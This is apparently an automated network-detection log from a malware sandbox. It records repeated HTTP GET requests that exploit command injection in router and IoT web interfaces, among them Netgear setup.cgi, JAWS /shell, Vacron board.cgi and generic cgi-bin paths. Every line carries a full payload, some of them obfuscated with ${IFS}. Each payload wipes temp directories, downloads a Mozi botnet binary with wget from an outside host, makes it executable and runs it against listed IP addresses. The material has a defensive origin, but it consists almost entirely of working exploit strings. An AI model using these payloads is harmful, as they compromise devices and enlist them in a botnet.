                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 157.231.213.112:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 24.168.121.6:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 112.194.38.63:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 15.252.209.178:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 46.183.211.158:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 178.16.80.106:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 79.22.85.51:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 15.46.95.211:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 181.219.130.184:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 15.182.220.70:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 78.103.46.151:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 95.86.254.133:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 47.104.135.117:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 53.76.178.29:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 102.60.227.138:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 204.30.144.174:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
